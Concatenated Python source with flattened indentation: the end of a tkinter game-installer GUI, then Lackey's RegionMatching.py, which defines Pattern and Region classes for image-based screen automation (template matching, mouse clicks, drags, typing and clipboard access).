controls.fraMore.pack(fill=tk.BOTH, expand=True)
def printToOutput(model, controls, commands, *a, **b):
if not model.isCancelled:
controls.txtOutput.insert(tk.END, f"{''.join(*a)}\n")
controls.txtOutput.see("end")
controls.pgrProgress.step()
else:
model.currentState.set("readyToInstall")
sys.exit()
def installPackage(items, installDir, model, newPrint):
try:
for package, version in items:
sspm.installPackagesCore([f"{package}@{version}"], installDir, True, newPrint)
except Exception as e:
newPrint(e)
model.currentState.set("readyToInstall")
return
model.currentState.set("readyToRun")
def runGame(model, controls, commands):
processToRun = os.path.join(model.installDir.get(), model.selectedRecipeInfo["main"])
subprocess.Popen([processToRun], cwd=model.installDir.get())
def cancelInstall(model, controls, commands):
controls.btnInstall.configure(state=tk.DISABLED)
model.isCancelled = True
controls.txtOutput.insert(tk.END, f"Cancelling the download process. Just a moment please.")
controls.txtOutput.see("end")
def installGame(model, controls, commands):
selectetedRecipe = model.selectedRecipe.get()
for recipe in model.recipes:
if recipe["description"] == selectetedRecipe:
selectetedRecipe = recipe
break
installDir = model.installDir.get()
model.showMore.set(False)
model.isCancelled = False
model.currentState.set("installing")
model.selectedRecipeInfo = selectetedRecipe
p1 = Thread(target=installPackage, args=(selectetedRecipe["dependencies"].items(), installDir,
model,
partial(printToOutput, model, controls, commands)))
p1.start()
|
RegionMatching.py
|
from PIL import Image, ImageTk
from numbers import Number
try:
import Tkinter as tk
import tkMessageBox as tkmb
except ImportError:
import tkinter as tk
import tkinter.messagebox as tkmb
import multiprocessing
import subprocess
import pyperclip
import tempfile
import platform
import numpy
import time
import uuid
import cv2
import sys
import os
import re
from .InputEmulation import Mouse as MouseClass, Keyboard
from .Exceptions import FindFailed, ImageMissing
from .SettingsDebug import Settings, Debug
from .TemplateMatchers import PyramidTemplateMatcher as TemplateMatcher
from .Geometry import Location
if platform.system() == "Windows" or os.environ.get('READTHEDOCS') == 'True':
# Avoid throwing an error if it's just being imported for documentation purposes
from .PlatformManagerWindows import PlatformManagerWindows
PlatformManager = PlatformManagerWindows()
elif platform.system() == "Darwin":
from .PlatformManagerDarwin import PlatformManagerDarwin
PlatformManager = PlatformManagerDarwin()
else:
raise NotImplementedError("Lackey is currently only compatible with Windows and OSX.")
# Python 3 compatibility
try:
basestring
except NameError:
basestring = str
try:
FOREVER = float("inf")
except:
import math
FOREVER = math.inf
# Instantiate input emulation objects
Mouse = MouseClass()
keyboard = Keyboard()
class Pattern(object):
""" Defines a pattern based on a bitmap, similarity, and target offset """
def __init__(self, target=None):
self.path = None
self.similarity = Settings.MinSimilarity
self.offset = Location(0, 0)
self.imagePattern = False
if isinstance(target, Pattern):
self.image = target.getImage()
self.similarity = target.similarity
self.offset = target.offset.offset(0, 0) # Clone Location
self.imagePattern = target.isImagePattern()
elif isinstance(target, basestring):
self.setFilename(target)
elif isinstance(target, numpy.ndarray):
self.setImage(target)
elif target is not None:
raise TypeError("Unrecognized argument for Pattern()")
def similar(self, similarity):
""" Returns a new Pattern with the specified similarity threshold """
pattern = Pattern(self.path)
pattern.similarity = similarity
return pattern
def getSimilar(self):
""" Returns the current minimum similarity """
return self.similarity
def exact(self):
""" Returns a new Pattern with a similarity threshold of 1.0 """
pattern = Pattern(self.path)
pattern.similarity = 1.0
return pattern
def isValid(self):
return (self.image is not None)
def targetOffset(self, dx, dy):
""" Returns a new Pattern with the given target offset """
pattern = Pattern(self.path)
pattern.similarity = self.similarity
pattern.offset = Location(dx, dy)
return pattern
def getFilename(self):
""" Returns the path to this Pattern's bitmap """
return self.path
def setFilename(self, filename):
""" Set the filename of the pattern's image (and load it) """
## Loop through image paths to find the image
found = False
for image_path in sys.path + [Settings.BundlePath, os.getcwd()] + Settings.ImagePaths:
full_path = os.path.join(image_path, filename)
if os.path.exists(full_path):
# Image file not found
found = True
break
## Check if path is valid
if not found:
self.path = filename
print(Settings.ImagePaths)
raise ImageMissing(ImageMissingEvent(pattern=self, event_type="IMAGEMISSING"))
self.path = full_path
self.image = cv2.imread(self.path)
return self
def setImage(self, img):
self.image = img
self.imagePattern = True
return self
def getImage(self):
return self.image
def getTargetOffset(self):
""" Returns the target offset as a Location(dx, dy) """
return self.offset
def isImagePattern(self):
return self.imagePattern
def debugPreview(self, title="Debug"):
""" Loads and displays the image at ``Pattern.path`` """
haystack = Image.open(self.path)
haystack.show()
class Region(object):
def __init__(self, *args):
if len(args) == 4:
x, y, w, h = args
elif len(args) == 1:
if isinstance(args[0], Region):
x, y, w, h = args[0].getTuple()
elif isinstance(args[0], tuple):
x, y, w, h = args[0]
else:
raise TypeError("Unrecognized argument for Region()")
elif len(args) == 5:
# We can safely ignore Sikuli's screen argument, as that's
# checked dynamically by the location of the region
x, y, w, h, screen = args
elif len(args) == 2:
# Minimal point-like region
x, y = args
w = 1
h = 1
else:
raise TypeError("Unrecognized argument(s) for Region()")
self.FOREVER = None
self.setROI(x, y, w, h)
self._lastMatch = None
self._lastMatches = []
self._lastMatchTime = 0
self.autoWaitTimeout = 3.0
# Converts searches per second to actual second interval
self._defaultScanRate = None
self._defaultTypeSpeed = 0.05
self._raster = (0, 0)
self._observer = Observer(self)
self._observeScanRate = None
self._repeatWaitTime = 0.3
self._throwException = True
self._findFailedResponse = "ABORT"
self._findFailedHandler = None
self._highlighter = None
CREATE_X_DIRECTION_LEFT = 0
CREATE_X_DIRECTION_RIGHT = 1
CREATE_Y_DIRECTION_TOP = 0
CREATE_Y_DIRECTION_BOTTOM = 1
@classmethod
def create(cls, *args):
if len(args) == 3 and isinstance(args[0], Location):
return cls(args[0].x, args[0].y, args[1], args[2])
elif len(args) == 5 and isinstance(args[0], Location):
loc, create_x_direction, create_y_direction, w, h = args
if create_x_direction == cls.CREATE_X_DIRECTION_LEFT:
x = loc.x
else:
x = loc.x - w
if create_y_direction == cls.CREATE_Y_DIRECTION_TOP:
y = loc.y
else:
y = loc.y - h
return cls(x, y, w, h)
def setX(self, x):
""" Set the x-coordinate of the upper left-hand corner """
self.x = int(x)
def setY(self, y):
""" Set the y-coordinate of the upper left-hand corner """
self.y = int(y)
def setW(self, w):
""" Set the width of the region """
self.w = max(1, int(w))
def setH(self, h):
""" Set the height of the region """
self.h = max(1, int(h))
def getX(self):
""" Get the x-coordinate of the upper left-hand corner """
return self.x
def getY(self):
""" Get the y-coordinate of the upper left-hand corner """
return self.y
def getW(self):
""" Get the width of the region """
return self.w
def getH(self):
""" Get the height of the region """
return self.h
def getTuple(self):
""" Returns the shape of the region as (x, y, w, h) """
return (self.x, self.y, self.w, self.h)
def setLocation(self, location):
""" Change the upper left-hand corner to a new ``Location``
Doesn't change width or height
"""
if not location or not isinstance(location, Location):
raise ValueError("setLocation expected a Location object")
self.x = location.x
self.y = location.y
return self
moveTo = setLocation
def setROI(self, *args):
""" Set Region of Interest (same as Region.setRect()) """
if len(args) == 4:
x, y, w, h = args
elif len(args) == 1:
if isinstance(args[0], Region):
x, y, w, h = args[0].getTuple()
elif isinstance(args[0], tuple):
x, y, w, h = args[0]
else:
raise TypeError("Unrecognized argument for Region()")
else:
raise TypeError("Unrecognized argument(s) for Region()")
self.setX(x)
self.setY(y)
self.setW(w)
self.setH(h)
setRect = setROI
def contains(self, point_or_region):
""" Checks if ``point_or_region`` is within this region """
if isinstance(point_or_region, Location):
return (self.x < point_or_region.x < self.x + self.w) and (self.y < point_or_region.y < self.y + self.h)
elif isinstance(point_or_region, Region):
return ((self.x < point_or_region.getX() < self.x + self.w) and
(self.y < point_or_region.getY() < self.y + self.h) and
(self.x < point_or_region.getX() + point_or_region.getW() < self.x + self.w) and
(self.y < point_or_region.getY() + point_or_region.getH() < self.y + self.h))
else:
raise TypeError("Unrecognized argument type for contains()")
def containsMouse(self):
return self.contains(Mouse.getPos())
def morphTo(self, region):
""" Change shape of this region to match the given ``Region`` object """
if not region or not isinstance(region, Region):
raise TypeError("morphTo expected a Region object")
self.setROI(region)
return self
def copyTo(self, screen):
if not isinstance(screen, Screen):
# Parameter was screen ID instead of object
screen = Screen(screen)
zero_coord = Location(screen.getX(), screen.getY())
this_screen = self.getScreen()
offset = Location(this_screen.getX() - zero_coord.x, this_screen.getY() - zero_coord.y)
target_coord = zero_coord.offset(offset.x, offset.y)
return Region(self).setLocation(target_coord)
def getCenter(self):
""" Return the ``Location`` of the center of this region """
return Location(self.x+(self.w/2), self.y+(self.h/2))
def getTopLeft(self):
""" Return the ``Location`` of the top left corner of this region """
return Location(self.x, self.y)
def getTopRight(self):
""" Return the ``Location`` of the top right corner of this region """
return Location(self.x+self.w, self.y)
def getBottomLeft(self):
""" Return the ``Location`` of the bottom left corner of this region """
return Location(self.x, self.y+self.h)
def getBottomRight(self):
""" Return the ``Location`` of the bottom right corner of this region """
return Location(self.x+self.w, self.y+self.h)
def getScreen(self):
""" Return an instance of the ``Screen`` object this region is inside.
Checks the top left corner of this region (if it touches multiple screens) is inside.
Returns None if the region isn't positioned in any screen.
"""
return self.getTopLeft().getScreen()
def getLastMatch(self):
""" Returns the last successful ``Match`` returned by ``find()``, ``exists()``, etc. """
return self._lastMatch
def getLastMatches(self):
""" Returns the last successful set of ``Match`` objects returned by ``findAll()`` """
return self._lastMatches
def getTime(self):
""" Returns the elapsed time in milliseconds to find the last match """
return self._lastMatchTime
def setAutoWaitTimeout(self, seconds):
""" Specify the time to wait for an image to appear on the screen """
self.autoWaitTimeout = float(seconds)
def getAutoWaitTimeout(self):
""" Returns the time to wait for an image to appear on the screen """
return self.autoWaitTimeout
def setWaitScanRate(self, seconds=None):
"""Set this Region's scan rate
A find op should repeat the search for the given Visual rate times per second until
found or the maximum waiting time is reached.
"""
self._defaultScanRate = float(seconds)
def getWaitScanRate(self):
""" Get the current scan rate """
return self._defaultScanRate if not self._defaultScanRate is None else Settings.WaitScanRate
def offset(self, location, dy=0):
""" Returns a new ``Region`` offset from this one by ``location``
Width and height remain the same
"""
if not isinstance(location, Location):
# Assume variables passed were dx,dy
location = Location(location, dy)
r = Region(self.x+location.x, self.y+location.y, self.w, self.h).clipRegionToScreen()
if r is None:
raise ValueError("Specified region is not visible on any screen")
return None
return r
def grow(self, width, height=None):
""" Expands the region by ``width`` on both sides and ``height`` on the top and bottom.
If only one value is provided, expands the region by that amount on all sides.
Equivalent to ``nearby()``.
"""
if height is None:
return self.nearby(width)
else:
return Region(
self.x-width,
self.y-height,
self.w+(2*width),
self.h+(2*height)).clipRegionToScreen()
def inside(self):
""" Returns the same object. Included for Sikuli compatibility. """
return self
def nearby(self, expand=50):
""" Returns a new Region that includes the nearby neighbourhood of the the current region.
The new region is defined by extending the current region's dimensions
all directions by range number of pixels. The center of the new region remains the
same.
"""
return Region(
self.x-expand,
self.y-expand,
self.w+(2*expand),
self.h+(2*expand)).clipRegionToScreen()
def above(self, expand=None):
""" Returns a new Region above the current region with a height of ``expand`` pixels.
Does not include the current region. If range is omitted, it reaches to the top of the
screen. The new region has the same width and x-position as the current region.
"""
if expand == None:
x = self.x
y = 0
w = self.w
h = self.y
else:
x = self.x
y = self.y - expand
w = self.w
h = expand
return Region(x, y, w, h).clipRegionToScreen()
def below(self, expand=None):
""" Returns a new Region below the current region with a height of ``expand`` pixels.
Does not include the current region. If range is omitted, it reaches to the bottom
of the screen. The new region has the same width and x-position as the current region.
"""
if expand == None:
x = self.x
y = self.y+self.h
w = self.w
h = self.getScreen().getBounds()[3] - y # Screen height
else:
x = self.x
y = self.y + self.h
w = self.w
h = expand
return Region(x, y, w, h).clipRegionToScreen()
def left(self, expand=None):
""" Returns a new Region left of the current region with a width of ``expand`` pixels.
Does not include the current region. If range is omitted, it reaches to the left border
of the screen. The new region has the same height and y-position as the current region.
"""
if expand == None:
x = 0
y = self.y
w = self.x
h = self.h
else:
x = self.x-expand
y = self.y
w = expand
h = self.h
return Region(x, y, w, h).clipRegionToScreen()
def right(self, expand=None):
""" Returns a new Region right of the current region with a width of ``expand`` pixels.
Does not include the current region. If range is omitted, it reaches to the right border
of the screen. The new region has the same height and y-position as the current region.
"""
if expand == None:
x = self.x+self.w
y = self.y
w = self.getScreen().getBounds()[2] - x
h = self.h
else:
x = self.x+self.w
y = self.y
w = expand
h = self.h
return Region(x, y, w, h).clipRegionToScreen()
def add(self, l, r, t, b):
x = self.getX() - l
y = self.getY() - t
w = self.getW() + l + r
h = self.getH() + t + b
self.setRect(x, y, w, h)
return self
def getBitmap(self):
""" Captures screen area of this region, at least the part that is on the screen
Returns image as numpy array
"""
return PlatformManager.getBitmapFromRect(self.x, self.y, self.w, self.h)
def debugPreview(self, title="Debug"):
""" Displays the region in a preview window.
If the region is a Match, circles the target area. If the region is larger than half the
primary screen in either dimension, scales it down to half size.
"""
region = self
haystack = self.getBitmap()
if isinstance(region, Match):
cv2.circle(
haystack,
(region.getTarget().x - self.x, region.getTarget().y - self.y),
5,
255)
if haystack.shape[0] > (Screen(0).getBounds()[2]/2) or haystack.shape[1] > (Screen(0).getBounds()[3]/2):
# Image is bigger than half the screen; scale it down
haystack = cv2.resize(haystack, (0, 0), fx=0.5, fy=0.5)
Image.fromarray(haystack).show()
def highlight(self, *args):
""" Highlights the region with a colored frame. Accepts the following parameters:
highlight([toEnable], [seconds], [color])
* toEnable (boolean): Enables or disables the overlay
* seconds (number): Seconds to show overlay
* color (string): Hex code ("#XXXXXX") or color name ("black")
"""
toEnable = (self._highlighter is None)
seconds = 3
color = "red"
if len(args) > 3:
raise TypeError("Unrecognized argument(s) for highlight()")
for arg in args:
if type(arg) == bool:
toEnable = arg
elif isinstance(arg, Number):
seconds = arg
elif isinstance(arg, basestring):
color = arg
if self._highlighter is not None:
self._highlighter.close()
if toEnable:
self._highlighter = PlatformManager.highlight((self.getX(), self.getY(), self.getW(), self.getH()), color, seconds)
def find(self, pattern):
""" Searches for an image pattern in the given region
Throws ``FindFailed`` exception if the image could not be found.
Sikuli supports OCR search with a text parameter. This does not (yet).
"""
findFailedRetry = True
while findFailedRetry:
match = self.exists(pattern)
if match is not None:
break
path = pattern.path if isinstance(pattern, Pattern) else pattern
findFailedRetry = self._raiseFindFailed("Could not find pattern '{}'".format(path))
if findFailedRetry:
time.sleep(self._repeatWaitTime)
return match
def findAll(self, pattern):
""" Searches for an image pattern in the given region
Returns ``Match`` object if ``pattern`` exists, empty array otherwise (does not
throw exception). Sikuli supports OCR search with a text parameter. This does not (yet).
"""
find_time = time.time()
r = self.clipRegionToScreen()
if r is None:
raise ValueError("Region outside all visible screens")
return None
seconds = self.autoWaitTimeout
if not isinstance(pattern, Pattern):
if not isinstance(pattern, basestring):
raise TypeError("find expected a string [image path] or Pattern object")
pattern = Pattern(pattern)
needle = cv2.imread(pattern.path)
if needle is None:
raise ValueError("Unable to load image '{}'".format(pattern.path))
needle_height, needle_width, needle_channels = needle.shape
positions = []
timeout = time.time() + seconds
# Check TemplateMatcher for valid matches
matches = []
while time.time() < timeout and len(matches) == 0:
matcher = TemplateMatcher(r.getBitmap())
matches = matcher.findAllMatches(needle, pattern.similarity)
time.sleep(1/self._defaultScanRate if self._defaultScanRate is not None else 1/Settings.WaitScanRate)
if len(matches) == 0:
Debug.info("Couldn't find '{}' with enough similarity.".format(pattern.path))
return iter([])
# Matches found! Turn them into Match objects
lastMatches = []
for match in matches:
position, confidence = match
x, y = position
lastMatches.append(
Match(
confidence,
pattern.offset,
((x+self.x, y+self.y), (needle_width, needle_height))))
self._lastMatches = iter(lastMatches)
Debug.info("Found match(es) for pattern '{}' at similarity ({})".format(pattern.path, pattern.similarity))
self._lastMatchTime = (time.time() - find_time) * 1000 # Capture find time in milliseconds
return self._lastMatches
def wait(self, pattern, seconds=None):
""" Searches for an image pattern in the given region, given a specified timeout period
Functionally identical to find(). If a number is passed instead of a pattern,
just waits the specified number of seconds.
Sikuli supports OCR search with a text parameter. This does not (yet).
"""
if isinstance(pattern, (int, float)):
if pattern == FOREVER:
while True:
time.sleep(1) # Infinite loop
time.sleep(pattern)
return None
if seconds is None:
seconds = self.autoWaitTimeout
findFailedRetry = True
timeout = time.time() + seconds
while findFailedRetry:
while True:
match = self.exists(pattern)
if match:
return match
if time.time() >= timeout:
break
path = pattern.path if isinstance(pattern, Pattern) else pattern
findFailedRetry = self._raiseFindFailed("Could not find pattern '{}'".format(path))
if findFailedRetry:
time.sleep(self._repeatWaitTime)
return None
def waitVanish(self, pattern, seconds=None):
""" Waits until the specified pattern is not visible on screen.
If ``seconds`` pass and the pattern is still visible, raises FindFailed exception.
Sikuli supports OCR search with a text parameter. This does not (yet).
"""
r = self.clipRegionToScreen()
if r is None:
raise ValueError("Region outside all visible screens")
return None
if seconds is None:
seconds = self.autoWaitTimeout
if not isinstance(pattern, Pattern):
if not isinstance(pattern, basestring):
raise TypeError("find expected a string [image path] or Pattern object")
pattern = Pattern(pattern)
needle = cv2.imread(pattern.path)
match = True
timeout = time.time() + seconds
while match and time.time() < timeout:
matcher = TemplateMatcher(r.getBitmap())
# When needle disappears, matcher returns None
match = matcher.findBestMatch(needle, pattern.similarity)
time.sleep(1/self._defaultScanRate if self._defaultScanRate is not None else 1/Settings.WaitScanRate)
if match:
return False
#self._findFailedHandler(FindFailed("Pattern '{}' did not vanish".format(pattern.path)))
def exists(self, pattern, seconds=None):
""" Searches for an image pattern in the given region
Returns Match if pattern exists, None otherwise (does not throw exception)
Sikuli supports OCR search with a text parameter. This does not (yet).
"""
find_time = time.time()
r = self.clipRegionToScreen()
if r is None:
raise ValueError("Region outside all visible screens")
return None
if seconds is None:
seconds = self.autoWaitTimeout
if isinstance(pattern, int):
# Actually just a "wait" statement
time.sleep(pattern)
return
if not pattern:
time.sleep(seconds)
if not isinstance(pattern, Pattern):
if not isinstance(pattern, basestring):
raise TypeError("find expected a string [image path] or Pattern object")
pattern = Pattern(pattern)
needle = cv2.imread(pattern.path)
if needle is None:
raise ValueError("Unable to load image '{}'".format(pattern.path))
needle_height, needle_width, needle_channels = needle.shape
match = None
timeout = time.time() + seconds
# Consult TemplateMatcher to find needle
while not match:
matcher = TemplateMatcher(r.getBitmap())
match = matcher.findBestMatch(needle, pattern.similarity)
time.sleep(1/self._defaultScanRate if self._defaultScanRate is not None else 1/Settings.WaitScanRate)
if time.time() > timeout:
break
if match is None:
Debug.info("Couldn't find '{}' with enough similarity.".format(pattern.path))
return None
# Translate local position into global screen position
position, confidence = match
position = (position[0] + self.x, position[1] + self.y)
self._lastMatch = Match(
confidence,
pattern.offset,
(position, (needle_width, needle_height)))
#self._lastMatch.debug_preview()
Debug.info("Found match for pattern '{}' at ({},{}) with confidence ({}). Target at ({},{})".format(
pattern.path,
self._lastMatch.getX(),
self._lastMatch.getY(),
self._lastMatch.getScore(),
self._lastMatch.getTarget().x,
self._lastMatch.getTarget().y))
self._lastMatchTime = (time.time() - find_time) * 1000 # Capture find time in milliseconds
return self._lastMatch
def click(self, target=None, modifiers=""):
""" Moves the cursor to the target location and clicks the default mouse button. """
if target is None:
target = self._lastMatch or self # Whichever one is not None
target_location = None
if isinstance(target, Pattern):
target_location = self.find(target).getTarget()
elif isinstance(target, basestring):
target_location = self.find(target).getTarget()
elif isinstance(target, Match):
target_location = target.getTarget()
elif isinstance(target, Region):
target_location = target.getCenter()
elif isinstance(target, Location):
target_location = target
else:
raise TypeError("click expected Pattern, String, Match, Region, or Location object")
if modifiers != "":
keyboard.keyDown(modifiers)
Mouse.moveSpeed(target_location, Settings.MoveMouseDelay)
time.sleep(0.1) # For responsiveness
if Settings.ClickDelay > 0:
time.sleep(min(1.0, Settings.ClickDelay))
Settings.ClickDelay = 0.0
Mouse.click()
time.sleep(0.1)
if modifiers != 0:
keyboard.keyUp(modifiers)
Debug.history("Clicked at {}".format(target_location))
def doubleClick(self, target=None, modifiers=""):
""" Moves the cursor to the target location and double-clicks the default mouse button. """
if target is None:
target = self._lastMatch or self # Whichever one is not None
target_location = None
if isinstance(target, Pattern):
target_location = self.find(target).getTarget()
elif isinstance(target, basestring):
target_location = self.find(target).getTarget()
elif isinstance(target, Match):
target_location = target.getTarget()
elif isinstance(target, Region):
target_location = target.getCenter()
elif isinstance(target, Location):
target_location = target
else:
raise TypeError("doubleClick expected Pattern, String, Match, Region, or Location object")
if modifiers != "":
keyboard.keyDown(modifiers)
Mouse.moveSpeed(target_location, Settings.MoveMouseDelay)
time.sleep(0.1)
if Settings.ClickDelay > 0:
time.sleep(min(1.0, Settings.ClickDelay))
Settings.ClickDelay = 0.0
Mouse.click()
time.sleep(0.1)
if Settings.ClickDelay > 0:
time.sleep(min(1.0, Settings.ClickDelay))
Settings.ClickDelay = 0.0
Mouse.click()
time.sleep(0.1)
if modifiers != 0:
keyboard.keyUp(modifiers)
def rightClick(self, target=None, modifiers=""):
""" Moves the cursor to the target location and clicks the right mouse button. """
if target is None:
target = self._lastMatch or self # Whichever one is not None
target_location = None
if isinstance(target, Pattern):
target_location = self.find(target).getTarget()
elif isinstance(target, basestring):
target_location = self.find(target).getTarget()
elif isinstance(target, Match):
target_location = target.getTarget()
elif isinstance(target, Region):
target_location = target.getCenter()
elif isinstance(target, Location):
target_location = target
else:
raise TypeError("rightClick expected Pattern, String, Match, Region, or Location object")
if modifiers != "":
keyboard.keyDown(modifiers)
Mouse.moveSpeed(target_location, Settings.MoveMouseDelay)
time.sleep(0.1)
if Settings.ClickDelay > 0:
time.sleep(min(1.0, Settings.ClickDelay))
Settings.ClickDelay = 0.0
Mouse.click(button=Mouse.RIGHT)
time.sleep(0.1)
if modifiers != "":
keyboard.keyUp(modifiers)
def hover(self, target=None):
""" Moves the cursor to the target location """
if target is None:
target = self._lastMatch or self # Whichever one is not None
target_location = None
if isinstance(target, Pattern):
target_location = self.find(target).getTarget()
elif isinstance(target, basestring):
target_location = self.find(target).getTarget()
elif isinstance(target, Match):
target_location = target.getTarget()
elif isinstance(target, Region):
target_location = target.getCenter()
elif isinstance(target, Location):
target_location = target
else:
raise TypeError("hover expected Pattern, String, Match, Region, or Location object")
Mouse.moveSpeed(target_location, Settings.MoveMouseDelay)
def drag(self, dragFrom=None):
""" Starts a dragDrop operation.
Moves the cursor to the target location and clicks the mouse in preparation to drag
a screen element """
if dragFrom is None:
dragFrom = self._lastMatch or self # Whichever one is not None
dragFromLocation = None
if isinstance(dragFrom, Pattern):
dragFromLocation = self.find(dragFrom).getTarget()
elif isinstance(dragFrom, basestring):
dragFromLocation = self.find(dragFrom).getTarget()
elif isinstance(dragFrom, Match):
dragFromLocation = dragFrom.getTarget()
elif isinstance(dragFrom, Region):
dragFromLocation = dragFrom.getCenter()
elif isinstance(dragFrom, Location):
dragFromLocation = dragFrom
else:
raise TypeError("drag expected dragFrom to be Pattern, String, Match, Region, or Location object")
Mouse.moveSpeed(dragFromLocation, Settings.MoveMouseDelay)
time.sleep(Settings.DelayBeforeMouseDown)
Mouse.buttonDown()
Debug.history("Began drag at {}".format(dragFromLocation))
def dropAt(self, dragTo=None, delay=None):
""" Completes a dragDrop operation
Moves the cursor to the target location, waits ``delay`` seconds, and releases the mouse
button """
if dragTo is None:
dragTo = self._lastMatch or self # Whichever one is not None
if isinstance(dragTo, Pattern):
dragToLocation = self.find(dragTo).getTarget()
elif isinstance(dragTo, basestring):
dragToLocation = self.find(dragTo).getTarget()
elif isinstance(dragTo, Match):
dragToLocation = dragTo.getTarget()
elif isinstance(dragTo, Region):
dragToLocation = dragTo.getCenter()
elif isinstance(dragTo, Location):
dragToLocation = dragTo
else:
raise TypeError("dragDrop expected dragTo to be Pattern, String, Match, Region, or Location object")
Mouse.moveSpeed(dragToLocation, Settings.MoveMouseDelay)
time.sleep(delay if delay is not None else Settings.DelayBeforeDrop)
Mouse.buttonUp()
Debug.history("Ended drag at {}".format(dragToLocation))
def dragDrop(self, target, target2=None, modifiers=""):
""" Performs a dragDrop operation.
Holds down the mouse button on ``dragFrom``, moves the mouse to ``dragTo``, and releases
the mouse button.
``modifiers`` may be a typeKeys() compatible string. The specified keys will be held
during the drag-drop operation.
"""
if modifiers != "":
keyboard.keyDown(modifiers)
if target2 is None:
dragFrom = self._lastMatch
dragTo = target
else:
dragFrom = target
dragTo = target2
self.drag(dragFrom)
time.sleep(Settings.DelayBeforeDrag)
self.dropAt(dragTo)
if modifiers != "":
keyboard.keyUp(modifiers)
def type(self, *args):
""" Usage: type([PSMRL], text, [modifiers])
If a pattern is specified, the pattern is clicked first. Doesn't support text paths.
Special keys can be entered with the key name between brackets, as `"{SPACE}"`, or as
`Key.SPACE`.
"""
pattern = None
text = None
modifiers = None
if len(args) == 1 and isinstance(args[0], basestring):
# Is a string (or Key) to type
text = args[0]
elif len(args) == 2:
if not isinstance(args[0], basestring) and isinstance(args[1], basestring):
pattern = args[0]
text = args[1]
else:
text = args[0]
modifiers = args[1]
elif len(args) == 3 and not isinstance(args[0], basestring):
pattern = args[0]
text = args[1]
modifiers = args[2]
else:
raise TypeError("type method expected ([PSMRL], text, [modifiers])")
if pattern:
self.click(pattern)
Debug.history("Typing '{}' with modifiers '{}'".format(text, modifiers))
kb = keyboard
if modifiers:
kb.keyDown(modifiers)
if Settings.TypeDelay > 0:
typeSpeed = min(1.0, Settings.TypeDelay)
Settings.TypeDelay = 0.0
else:
typeSpeed = self._defaultTypeSpeed
kb.type(text, typeSpeed)
if modifiers:
kb.keyUp(modifiers)
time.sleep(0.2)
def paste(self, *args):
""" Usage: paste([PSMRL], text)
If a pattern is specified, the pattern is clicked first. Doesn't support text paths.
``text`` is pasted as is using the OS paste shortcut (Ctrl+V for Windows/Linux, Cmd+V
for OS X). Note that `paste()` does NOT use special formatting like `type()`.
"""
target = None
text = ""
if len(args) == 1 and isinstance(args[0], basestring):
text = args[0]
elif len(args) == 2 and isinstance(args[1], basestring):
self.click(target)
text = args[1]
else:
raise TypeError("paste method expected [PSMRL], text")
pyperclip.copy(text)
# Triggers OS paste for foreground window
PlatformManager.osPaste()
time.sleep(0.2)
def getClipboard(self):
""" Returns the contents of the clipboard
Can be used to pull outside text into the application, if it is first
copied with the OS keyboard shortcut (e.g., "Ctrl+C") """
return pyperclip.paste()
def text(self):
""" OCR method. Todo. """
raise NotImplementedError("OCR not yet supported")
def mouseDown(self, button):
""" Low-level mouse actions. """
return PlatformManager.mouseButtonDown(button)
def mouseUp(self, button=Mouse.LEFT):
""" Low-level mouse actions """
return Mouse.buttonUp(button)
def mouseMove(self, PSRML=None, dy=0):
""" Low-level mouse actions """
if PSRML is None:
PSRML = self._lastMatch or self # Whichever one is not None
if isinstance(PSRML, Pattern):
move_location = self.find(PSRML).getTarget()
elif isinstance(PSRML, basestring):
move_location = self.find(PSRML).getTarget()
elif isinstance(PSRML, Match):
move_location = PSRML.getTarget()
elif isinstance(PSRML, Region):
move_location = PSRML.getCenter()
elif isinstance(PSRML, Location):
move_location = PSRML
elif isinstance(PSRML, int):
# Assume called as mouseMove(dx, dy)
offset = Location(PSRML, dy)
move_location = Mouse.getPos().offset(offset)
else:
raise TypeError("doubleClick expected Pattern, String, Match, Region, or Location object")
Mouse.moveSpeed(move_location)
def wheel(self, *args): # [PSRML], direction, steps
""" Clicks the wheel the specified number of ticks. Use the following parameters:
wheel([PSRML], direction, steps, [stepDelay])
"""
if len(args) == 2:
PSRML = None
direction = int(args[0])
steps = int(args[1])
stepDelay = None
elif len(args) == 3:
PSRML = args[0]
direction = int(args[1])
steps = int(args[2])
stepDelay = None
elif len(args) == 4:
PSRML = args[0]
direction = int(args[1])
steps = int(args[2])
stepDelay = int(args[3])
if PSRML is not None:
self.mouseMove(PSRML)
Mouse.wheel(direction, steps)
def atMouse(self):
return Mouse.at()
def keyDown(self, keys):
""" Concatenate multiple keys to press them all down. """
return keyboard.keyDown(keys)
def keyUp(self, keys):
""" Concatenate multiple keys to up them all. """
return keyboard.keyUp(keys)
def write(self, text):
""" Has fancy special options. Not implemented yet. """
raise NotImplementedError()
def delayType(millisecs):
Settings.TypeDelay = millisecs
def isRegionValid(self):
""" Returns false if the whole region is not even partially inside any screen, otherwise true """
screens = PlatformManager.getScreenDetails()
for screen in screens:
s_x, s_y, s_w, s_h = screen["rect"]
if self.x+self.w >= s_x and s_x+s_w >= self.x and self.y+self.h >= s_y and s_y+s_h >= self.y:
# Rects overlap
return True
return False
def clipRegionToScreen(self):
""" Returns the part of the region that is visible on a screen
If the region equals to all visible screens, returns Screen(-1).
If the region is visible on multiple screens, returns the screen with the smallest ID.
Returns None if the region is outside the screen.
"""
if not self.isRegionValid():
return None
screens = PlatformManager.getScreenDetails()
total_x, total_y, total_w, total_h = Screen(-1).getBounds()
containing_screen = None
for screen in screens:
s_x, s_y, s_w, s_h = screen["rect"]
if self.x >= s_x and self.x+self.w <= s_x+s_w and self.y >= s_y and self.y+self.h <= s_y+s_h:
# Region completely inside screen
return self
elif self.x+self.w <= s_x or s_x+s_w <= self.x or self.y+self.h <= s_y or s_y+s_h <= self.y:
# Region completely outside screen
continue
elif self.x == total_x and self.y == total_y and self.w == total_w and self.h == total_h:
# Region equals all screens, Screen(-1)
return self
else:
# Region partially inside screen
x = max(self.x, s_x)
y = max(self.y, s_y)
w = min(self.w, s_w)
h = min(self.h, s_h)
return Region(x, y, w, h)
return None
# Partitioning constants
NORTH = 202 # Upper half
NORTH_WEST = 300 # Left third in upper third
NORTH_MID = 301 # Middle third in upper third
NORTH_EAST = 302 # Right third in upper third
SOUTH = 212 # Lower half
SOUTH_WEST = 320 # Left third in lower third
SOUTH_MID = 321 # Middle third in lower third
SOUTH_EAST = 322 # Right third in lower third
EAST = 220 # Right half
EAST_MID = 310 # Middle third in right third
WEST = 221 # Left half
WEST_MID = 312 # Middle third in left third
MID_THIRD = 311 # Middle third in middle third
TT = 200 # Top left quarter
RR = 201 # Top right quarter
BB = 211 # Bottom right quarter
LL = 210 # Bottom left quarter
MID_VERTICAL = "MID_VERT" # Half of width vertically centered
